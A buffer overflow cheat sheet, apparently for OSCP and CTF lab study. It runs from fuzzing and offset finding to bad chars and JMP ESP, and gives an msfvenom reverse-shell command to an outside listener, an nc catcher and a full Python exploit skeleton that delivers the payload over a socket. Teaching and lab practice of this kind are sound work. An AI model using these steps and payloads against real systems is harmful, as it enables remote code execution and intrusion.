CyberCheatsheets

Buffer Overflow Cheat Sheet

Stack-based buffer overflow workflow: fuzz, find the offset, control EIP, find bad chars, locate a JMP ESP, and get a shell.

Category: Exploitation & Payloads. Tags: binary-exploitation, buffer-overflow, oscp, pwn, stack. Updated 2026-06-17

Overview

A classic stack-based buffer overflow sends more data than a stack buffer can hold and overwrites the saved return address; when the function returns, that value is popped into EIP, so you choose where execution continues and point it at your shellcode. This is the staple OSCP/CTF exploitation pattern. The methodology is mechanical: fuzz to crash, find the exact offset, confirm EIP control, identify bad characters, find a JMP ESP, then place shellcode right after the return address, which is where ESP points at the moment the jump executes.

Authorized testing and learning only. Develop and run exploits against software/labs you own or are permitted to test.

1. Fuzz to find the crash

Send increasing buffers (step by 100 bytes) until the program crashes

python3 -c "print('A'*100)"

Note the size at which the crash happens and EIP reads 41414141 (e.g. ~600); that is the length your pattern in step 2 must cover

2. Find the exact offset

Generate a cyclic De Bruijn pattern

msf-pattern_create -l 600

Look up the EIP value as the debugger shows it to get the exact offset (x86 is little-endian, so the four pattern bytes sit reversed in memory). The -l length must be at least the crash size, or the lookup finds nothing

msf-pattern_offset -l 600 -q 35724134
# [*] Exact match at offset 524

pwntools equivalents (the -l lookup only works for a crash produced with pwntools' own cyclic pattern; its alphabet differs from msf's, so do not mix the two)

cyclic 600   /   cyclic -l 0x<EIP>

3. Confirm EIP control

buf = b'A'*offset + b'BBBB' + b'C'*100

EIP should read 42424242: you now control execution flow. ESP points at the start of the C's, which is why a JMP ESP will land on whatever you place after the return address

4. Find bad characters

Send every byte value except \x00 in place of the shellcode (right after the return address, so it sits at ESP)

badchars = bytes(range(1,256))

Immunity/mona: generate reference bytearray

!mona bytearray -b "\x00"

Compare the bytes at ESP with the reference; only the first mangled byte is reliable, so exclude it, regenerate the bytearray with -b "\x00\x<bad>", re-send, and repeat until the compare reports Unmodified

!mona compare -f bytearray.bin -a <ESP>

5. Find a JMP ESP

mona: find a JMP ESP address with no bad chars

!mona jmp -r esp -cpb "\x00\x0a"

Static search in a module with ASLR and Rebase disabled (check !mona modules); jmp esp is the opcode FF E4

objdump -d binary | grep 'jmp.*esp'
!mona find -s "\xff\xe4" -m <module.dll>

Overwrite EIP with the JMP ESP address, written little-endian (example address; use the one mona/objdump gave you)

buf = b'A'*offset + p32(0x625011af) + nops + shellcode

6. Generate shellcode & exploit

Reverse shell shellcode with bad chars excluded; EXITFUNC=thread keeps the target process alive when the shell exits, -v names the output variable

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 EXITFUNC=thread -f py -v shellcode -b "\x00\x0a"

Final payload: padding + EIP + NOP sled + shellcode

buf = b'A'*offset + p32(jmp_esp) + b'\x90'*16 + shellcode

Catch the shell, then run the exploit

nc -lvnp 443
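The six steps above as one scripted walk-through. This is an added example for this sheet, not code from the original page: it reimplements the msf-pattern_create/msf-pattern_offset layout so the offset lookup runs offline, builds the final buffer the way step 6 describes, and refuses a JMP ESP address or shellcode containing a bad char. Assumptions: the target speaks a line-based TCP protocol (optional command prefix, data, CRLF), the EIP value 0x35724134 and the JMP ESP address 0x625011af are illustrative, and the shellcode is an INT3 placeholder to be replaced with msfvenom's -f py output.

```python
#!/usr/bin/env python3
"""Stack overflow exploit skeleton: fuzz, offset, bad chars, JMP ESP, payload.

Added example. The protocol shape (prefix + data + CRLF), the EIP value,
the JMP ESP address and the INT3 shellcode placeholder are all assumptions.
"""
import socket
import string
import struct
import sys

# msf-pattern_create layout: digit changes fastest, then lowercase, then
# uppercase ("Aa0Aa1...Aa9Ab0...Zz9"), 20280 unique bytes in total.
_UPPER, _LOWER, _DIGIT = string.ascii_uppercase, string.ascii_lowercase, string.digits


def p32(value):
    """Pack a 32-bit address little-endian (same as pwntools' p32)."""
    return struct.pack("<I", value)


def pattern_create(length):
    """Equivalent of `msf-pattern_create -l <length>`."""
    out = bytearray()
    for u in _UPPER:
        for lo in _LOWER:
            for d in _DIGIT:
                out += (u + lo + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, eip):
    """Equivalent of `msf-pattern_offset -q <eip>`: offset of the 4 bytes that
    landed in EIP, or None if the pattern was too short to contain them.
    `eip` is the register value as the debugger shows it; the bytes sit
    reversed in memory because x86 is little-endian."""
    idx = pattern.find(p32(eip))
    return None if idx < 0 else idx


def probe_bytes(excluded=b"\x00"):
    """Step 4 probe: every byte value except the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in excluded)


def first_bad_char(sent, observed):
    """What `!mona compare` reports: the first byte that did not arrive intact.
    Only the first mismatch is trustworthy (a mangled byte or a truncation
    corrupts everything after it), so exclude it, re-send and repeat."""
    for s, o in zip(sent, observed):
        if s != o:
            return s
    if len(observed) < len(sent):          # string truncated at this byte
        return sent[len(observed)]
    return None


def contains_bad_chars(data, bad):
    return any(b in bad for b in data)


def build_payload(offset, jmp_esp, shellcode, bad=b"\x00", nops=16):
    """padding + EIP (JMP ESP) + NOP sled + shellcode; refuses a bad char in
    the part that must survive (the return address and everything after it)."""
    ret = p32(jmp_esp)
    if contains_bad_chars(ret, bad):
        raise ValueError("JMP ESP address %#x contains a bad char" % jmp_esp)
    if contains_bad_chars(shellcode, bad):
        raise ValueError("shellcode contains a bad char: re-encode with msfvenom -b")
    return b"A" * offset + ret + b"\x90" * nops + shellcode


def send_buffer(host, port, data, prefix=b"", timeout=3):
    """Deliver one buffer; `prefix` is the target's command word (assumption)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            s.recv(1024)                  # banner, if the service sends one
        except socket.timeout:
            pass
        s.sendall(prefix + data + b"\r\n")
        return s.recv(1024)               # raises once the process has died


def fuzz(host, port, prefix=b"", step=100, limit=5000):
    """Step 1: grow the buffer by `step` until the service stops answering;
    returns that size (then check the debugger for EIP = 41414141)."""
    for size in range(step, limit + 1, step):
        try:
            send_buffer(host, port, b"A" * size, prefix)
        except (socket.timeout, ConnectionError):
            return size
    return None


if __name__ == "__main__":
    # Constructed walk-through: 600-byte pattern, debugger shows EIP 35724134.
    offset = pattern_offset(pattern_create(600), 0x35724134)   # 524
    shellcode = b"\xcc" * 4                 # placeholder: paste msfvenom -f py output
    buf = build_payload(offset, 0x625011af, shellcode, bad=b"\x00\x0a")
    print("offset %d, payload %d bytes" % (offset, len(buf)))
    if len(sys.argv) == 3:                  # python3 exploit.py <host> <port>
        send_buffer(sys.argv[1], int(sys.argv[2]), buf)
```

Run it with no arguments to check the offset and buffer layout locally; pass a host and port to deliver the buffer to a lab target. Note that the EIP value 39694438 only resolves with a pattern of 2607 bytes or more, so a 600-byte pattern would have returned nothing for it; always generate a pattern at least as long as the crash size.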

Tips

  • \x00 (null) is almost always a bad char; \x0a and \x0d are common too — always verify per target.
  • A NOP sled (\x90) before shellcode absorbs small landing-address variance.
  • Pick a JMP ESP from a module with ASLR and Rebase disabled (!mona modules shows both flags) and with no bad chars in its address; the process must also run without DEP, otherwise the jump into stack shellcode faults on the first NOP.
  • Use pwntools (cyclic, p32, remote) to script the whole thing once you understand the manual steps.
